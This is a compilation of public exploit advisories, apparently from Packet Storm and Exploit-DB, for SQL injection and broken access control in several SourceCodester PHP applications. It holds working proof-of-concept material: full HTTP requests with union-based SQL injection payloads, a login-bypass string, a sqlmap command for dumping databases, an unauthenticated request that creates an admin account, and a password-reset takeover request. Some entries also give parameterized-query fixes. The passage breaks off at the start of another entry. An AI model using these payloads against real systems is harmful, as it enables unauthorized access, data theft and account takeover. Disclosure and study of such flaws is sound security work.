SQL injection vulnerability in sourcecodester mobile-shop-system-php-mysql 1.0 allows remote attackers to log in via crafterdstring in the email field of the log in page.

    # Title: Mobile Shop System v1.0 - SQLi lead to authentication bypass# Exploit Author: Moaaz Taha (0xStorm)# Date: 2020-09-08# Vendor Homepage: https://www.sourcecodester.com/php/14412/mobile-shop-system-php-mysql.html# Software Link: https://www.sourcecodester.com/download-code?nid=14412&title=Mobile+Shop+System+in+PHP+MySQL# Version: 1.0# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4# POC1- Go to "http://TARGET/mobileshop-master/login.php" or "http://TARGET/mobileshop-master/LoginAsAdmin.php"2- Inject this SQL payload (test' or 1=1 -- -) in email field and any password in password field.3- Click on "login", then you will bypass the authentication successfully.# Malicious HTTP POST RequestsPOST /mobileshop-master/login.php HTTP/1.1Host: 192.168.1.55:8888User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.1.55:8888/mobileshop-master/login.phpContent-Type: application/x-www-form-urlencodedContent-Length: 44Connection: closeUpgrade-Insecure-Requests: 1email=test%27+or+1%3D1+--+-&password=test123==========================================================================POST /mobileshop-master/LoginAsAdmin.php HTTP/1.1Host: 192.168.1.55:8888User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.1.55:8888/mobileshop-master/LoginAsAdmin.phpContent-Type: application/x-www-form-urlencodedContent-Length: 44Connection: closeCookie: PHPSESSID=d7c49f6634a208dca0624f2f6b1d27b6Upgrade-Insecure-Requests: 1email=test%27+or+1%3D1+--+-&password=test123

CVE-2021-34248: Mobile Shop System 1.0 SQL Injection ≈ Packet Storm

SQL injection vulnerability in sourcecodester online-book-store 1.0 allows remote attackers to view sensitive information via the id paremeter in application URL.

    # Title: Online Book Store 1.0 - 'id' SQL Injection
    # Exploit Author: Moaaz Taha (0xStorm)
    # Date: 2020-08-21
    # Vendor Homepage: https://www.sourcecodester.com/php/14383/online-book-store.html
    # Software Link: https://www.sourcecodester.com/download-code?nid=14383&title=Online+Book+Store
    # Version: 1.0
    # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
    # Description
    This parameter "id" is vulnerable to Union-Based blind SQL injection in this path "/online%20book%20store/detail.php?id=44" that leads to retrieve all databases.
    
    #POC
    sqlmap -u "http://TARGET/online%20book%20store/detail.php?id=44" -p id --dbms=mysql --threads=10 --technique=U --dbs

CVE-2021-34249: Offensive Security’s Exploit Database Archive

Music Gallery Site version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Music Gallery Site - SQL Injection on page music_list.php and parameter cid is vulnerable, application url is (?page=music_list&cid=?). >Any remote attacker can access this page to exploit the vulnerbility.### Date: > 21 February 2023### CVE Assigned:**[CVE-2023-0938](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0938)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0938) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0938)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> music_list.php> On this page cid parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: /?page=music_list&cid=*### Description:> The Music Gallery site does have public pages for music library, on music list there is an SQL injection to filter out the music list with category basis.### Proof of Concept:> Following steps are involved:1. Go to the category menu and click on view category.2. In URL, there is a parameter 'cid' which is vulnerable to SQL injection (?page=music_list&cid=4*)### Request:```GET /php-music/?page=music_list&cid=5%27+and+false+union+select+1,version(),database(),4,5,6,7--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/220299762-3a0c02cf-364b-49a0-81e5-e7f3f6ed298b.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * FROM `category_list` where `id` = :id and `delete_flag` = 0 and `status` = 1");$sql->bindparam(':id', $cid);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading---------------------------------------------------------------------------------------------# Music Gallery Site - SQL Injection on page view_music_details.php and parameter id is vulnerable. >Any remote attacker can access this page to exploit the vulnerbility.### Date: > 21 February 2023### CVE Assigned:**[CVE-2023-0961](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0961)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0961) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0961)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.# Vulnerable URL:> URL: php-music/view_music_details.php?id=*### Affected Page:> view_music_details.php> On this page cid parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: php-music/view_music_details.php?id=*### Description:> The Music Gallery site does have public pages for music library. Whenever someone click on info button any music the popup will appear on the same page. However, on backend server calls the file view_music_detail.php where Get id parameter is vulnerable to SQL Injection.### Proof of Concept:> Following steps are involved:1. Go to the music list and click on view info of any music.2. intercept the traffic through burp and get the actual URL3. In URL, there is a parameter 'id' which is vulnerable to SQL injection (view_music_details.php?id=1*)### Request:```GET /php-music/view_music_details.php?id=1%27+and+false+union+select+1,version(),database(),4,@@datadir,6,7,8,9,10,11--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=a5fd11866a86264db3a68bb1817b2c7fConnection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/220317330-519b0112-85fd-4c6f-bf35-446216d73549.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * from `music_list` where id = :id and delete_flag = 0");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading---------------------------------------------------------------------------------------------# Music Gallery Site - SQL Injection on page Master.php and parameter id is vulnerable. > Any remote attacker can access this page to exploit the vulnerbility.### Date: > 21 February 2023### CVE Assigned:**[CVE-2023-0962](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0962)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0962) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0962)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.# Vulnerable URL:> URL: php-music/classes/Master.php?f=get_music_details&id=*### Affected Page:> Master.php> On this page, there is "get_music_details" in that id parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: php-music/classes/Master.php?f=get_music_details&id=*### Description:> The Music Gallery site does have public pages for music library. Whenever someone click on play button any music the popup will appear on the same page. However, on backend server calls the file Master.php, in that file "get_music_details" is running the music and this function Get id parameter is vulnerable to SQL Injection.### Proof of Concept:> Following steps are involved:1. Go to the music list and click on play button of any music.2. intercept the traffic through burp and get the actual URL3. In URL, there is a parameter 'id' which is vulnerable to SQL injection (Master.php?f=get_music_details&id=1*)### Request:```GET /php-music/classes/Master.php?f=get_music_details&id=1%27+and+false+union+select+1,version(),@@datadir,4,5,6,7,8,9,10,11--+- HTTP/1.1Host: localhostCache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=a5fd11866a86264db3a68bb1817b2c7fConnection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/220339548-20e31f82-cab4-4732-8cf7-8a146c2c1d5b.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * FROM `music_list` where `id` = :id");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading

Music Gallery Site 1.0 SQL Injection

Music Gallery Site version 1.0 suffers from a missing authentication vulnerability that allows for privilege escalation.

# Music Gallery Site - Broken Access Control leads to compromise of complete application by adding admin user without log-in into the application.

### Date:   
> 21 February 2023

### CVE Assigned:  
**[CVE-2023-0963](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0963)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0963) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0963)

### Author Email:   
> navaidnasari@hotmail.co.uk  
### Vendor Homepage:  
> https://www.sourcecodester.com  
### Software Link:  
> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)  
### Version:  
> v 1.0  
### Broken Authentication:  
> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.

### Vulnerable URLs:  
> /php-music/classes/Users.php

>/php-music/classes/Master.php

### Affected Page:  
> Users.php , Master.php  
> On these page, application isn't verifying the authenticated mechanism. Due to that, all the parameters are vulnerable to broken access control and any remote attacker could create and update the data into the application. Specifically, Users.php could allow to remote attacker to create a admin user without log-in to the application.  
### Description:  
> Broken access control allows any remote attacker to create, update and delete the data of the application. Specifically, adding the admin users  
### Proof of Concept:  
> Following steps are involved:  
1. Send a POST request with required parameter to Users.php?f=save (See Below Request)

2. Request:  
```  
POST /php-music/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
Content-Length: 876  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjwBNagY7zt6cjYHp  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
sec-ch-ua-platform: "Linux"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/php-music/admin/?page=user/manage_user  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="id"

------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="firstname"

Test  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="middlename"

Admin  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="lastname"

Check  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="username"

testadmin  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="password"

test123  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="type"

1  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundaryjwBNagY7zt6cjYHp--

```

3. It will create the user by defining the valid values (see below screenshot of successfull response), Successful exploit screenshots are below (without cookie parameter)

![image](https://user-images.githubusercontent.com/123810418/220352229-389dfaf8-57e0-470d-b8a5-c873a13b3b51.png)

![image](https://user-images.githubusercontent.com/123810418/220352493-ef35a8ba-c613-4745-9004-0159b3841951.png)

4. Vulnerable Code Snippets:

Users.php

![image](https://user-images.githubusercontent.com/123810418/220353008-b1448508-7451-412a-a5eb-049aa20b3d41.png)

Master.php

![image](https://user-images.githubusercontent.com/123810418/220353132-1067a86c-282d-4fc5-8733-ceab4b1fef56.png)

### Recommendation:  
> Whoever uses this CMS, should update the authorization mechanism on top of the  Users.php , Master.php pages as per requirement to avoid a Broken Access Control attack:

Music Gallery Site 1.0 Privilege Escalation / Missing Authentication

Employee Task Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Employee Task Management System - SQL Injection on (task-details.php?task_id=?) with low privilege authentication### Date: > 17 February 2023### CVE Assigned:**[CVE-2023-0904](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0904)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0904), [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0904)### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Employee Task Management System](https://www.sourcecodester.com/php/15383/employee-task-management-system-phppdo-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> task-details.php> On this page task_id parameter is vulnerable to SQL Injection Attack### Description:> The employee task management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.s. Task Management (view and edit only assigned tasks) and Attendance (clock In and out)> So, if the admin assigns a task to a normal employee, an employee could perform the SQL Injection by viewing that task from his/her profile. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:+ Admin assigned a task to an employee (ABC)+ ABC employee view the task and could perform the SQL injection with vulnerable parameter (task-details.php?task_id=765)### Request:```GET /etms/task-details.php?task_id=765%27+and+false+union+select+1,version(),3,database(),user(),6,7,8--+- HTTP/1.1Host: localhostCache-Control: max-age=0sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ntknjcf821q2u3h85c14qo1r91Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219780565-6fb7a74b-ac7f-4ec2-997a-3c69abdf37f7.png)### Recommendation:> Whoever uses this CMS, should update line no (from 27 to 30) of task-details.php with the following code to avoid SQL Injection attack:```Old Code:$sql = "SELECT a.*, b.fullname FROM task_info aLEFT JOIN tbl_admin b ON(a.t_user_id = b.user_id)WHERE task_id='$task_id'";$info = $obj_admin->manage_all_info($sql);``````New Code: $sql = $obj_admin->db->prepare("SELECT a.*, b.fullname FROM task_info a LEFT JOIN tbl_admin b ON(a.t_user_id = b.user_id) WHERE task_id=:task_id ");$sql->bindparam(':task_id', $task_id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo-------------------------------------------------# Employee Task Management System - SQL Injection with low privilege authentication### Date: > 17 February 2023### CVE Assigned:**[CVE-2023-0902](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0903)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0903), [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0903)### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Employee Task Management System](https://www.sourcecodester.com/php/15383/employee-task-management-system-phppdo-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> edit-task.php> On this page task_id parameter is vulnerable to SQL Injection Attack### Description:> The employee task management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.s. Task Management (only assigned tasks) and Attendance (clock In and out)> So, if the admin assigns a task to a normal employee, an employee could perform the SQL Injection by editing that task from his/her profile. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:+ Admin assigned a task to an employee (ABC)+ ABC employee edit the task and could perform the SQL injection with vulnerable parameter (edit-task.php?task_id=765)### Request:```GET /etms/edit-task.php?task_id=765%27+and+false+union+select+1,version(),3,database(),user(),6,7--+- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ntknjcf821q2u3h85c14qo1r91Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219764941-37ede104-c4a5-4500-94f2-2fca6e051343.png)### Recommendation:> Whoever uses this CMS, should update line no 27 and 28 of edit-task.php with the following code to avoid SQL Injection attack:```Old Code:$sql = "SELECT * FROM task_info WHERE task_id='$task_id' ";$info = $obj_admin->manage_all_info($sql);``````New Code: $sql = $obj_admin->db->prepare("SELECT * FROM task_info WHERE task_id=:task_id ");$sql->bindparam(':task_id', $task_id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Employee Task Management System 1.0 SQL Injection

Employee Task Management System version 1.0 suffers from a privilege escalation vulnerability due to a broken access control where a lower privileged user's cookie can be leveraged to takeover an administrative account.

    # Employee Task Management System - Broken Authentication leads to compromise of all application accounts by changing the password### Date: > 17 February 2023### CVE Assigned:**[CVE-2023-0905](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0905)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0905), [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0905)### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Employee Task Management System](https://www.sourcecodester.com/php/15383/employee-task-management-system-phppdo-free-source-code.html)### Version:> v 1.0### Broken Authentication:> Broken authentication occurs when the authentication mechanisms in a web application are not implemented correctly, allowing an attacker to bypass them and gain unauthorized access to the application's features and resources. If an attacker is able to exploit broken authentication and gain access to a user's account, they may be able to change the account password, effectively locking the legitimate user out of the system. This is particularly dangerous because if the attacker can compromise one user account, they may be able to use that account to gain access to other accounts and escalate their privileges, potentially compromising the entire system.### Affected Page:> changePasswordForEmployee.php> On this page, application isn't verifying the authentication/authorization mechanism. Due to that, all the parameters are vulnerable to broken authentication.### Description:> Broken Authentication allows unauthenticated remote attacker to change password of all application users### Proof of Concept:> Following steps are involved:1. Visit the vulnerable page: changePasswordForEmployee.php2. Type any random password which needs to update against any user id and submit3. Intercept that request through Burp Suite4. Request:```POST /etms/changePasswordForEmployee.php HTTP/1.1Host: localhostContent-Length: 277Cache-Control: max-age=0sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/etms/changePasswordForEmployee.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ntknjcf821q2u3h85c14qo1r91Connection: closeuser_id=%3Cbr+%2F%3E%0D%0A%3Cb%3EWarning%3C%2Fb%3E%3A++Undefined+variable+%24user_id+in+%3Cb%3EC%3A%5Cxampp%5Chtdocs%5Cetms%5CchangePasswordForEmployee.php%3C%2Fb%3E+on+line+%3Cb%3E34%3C%2Fb%3E%3Cbr+%2F%3E%0D%0A&password=admin%23123&re_password=admin%23123&change_password_btn=```5. because the "user_id" parameter is not set due to missing authentication, so we need to set the user_id manually. By default user_id 1 is for admin and we can use intruder to bruteforce this step with incremental value. Whenever the server will find the correct user_id, it will change the password and log in to the application.6. Successful exploit screenshots are below (without cookie parameter)![image](https://user-images.githubusercontent.com/123810418/219798138-747388d7-378b-4d1b-9862-1356e52a0c72.png)![image](https://user-images.githubusercontent.com/123810418/219798264-f04bcda9-a833-4010-a40b-076a38199938.png)![image](https://user-images.githubusercontent.com/123810418/219798299-5ba92752-d218-4aaa-b123-5258df37ce38.png)7. Vulnerable Code Snippets:![image](https://user-images.githubusercontent.com/123810418/219799518-50d3eb1a-0091-4229-b7d0-7621d79cc168.png)![image](https://user-images.githubusercontent.com/123810418/219799657-42b9a71c-539c-4e91-bec8-0d7fd40cb3ed.png)### Recommendation:> Whoever uses this CMS, should update the authentication and authorization mechanism on top of the changePasswordForEmployee.php as per their requirement to avoid a Broken Authentication attackThank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Employee Task Management System 1.0 Privilege Escalation

Auto Dealer Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Auto Dealer Management System - SQL Injection on page view_transaction.php and parameter is id, application url is (?page=vehicles/view_transaction&id=?) with low privilege authentication### Date: > 18 February 2023### CVE Assigned:**[CVE-2023-0912](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0912)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0912) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0912)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> view_transaction.php> On this page id parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: ?page=vehicles/view_transaction&id=*### Description:> The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction)> Employee could perform the SQL Injection by viewing the vehicle transaction from his/her profile. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:+ An employee view the vehicle transaction and could perform the SQL injection with vulnerable parameter (?page=vehicles/view_transaction&id=5*)### Request:```GET /adms/admin/?page=vehicles/view_transaction&id=5%27+and+false+union+select+1,2,3,4,5,6,7,8,9,database(),version(),12,13,user()--+- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219882001-6031474c-b28b-4401-b282-6ff470086be3.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT *, concat(firstname,' ',COALESCE(concat(middlename,' '), ''), lastname) as customer from `transaction_list` where id = :id ");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo--------------------------------------------------------------------------# Auto Dealer 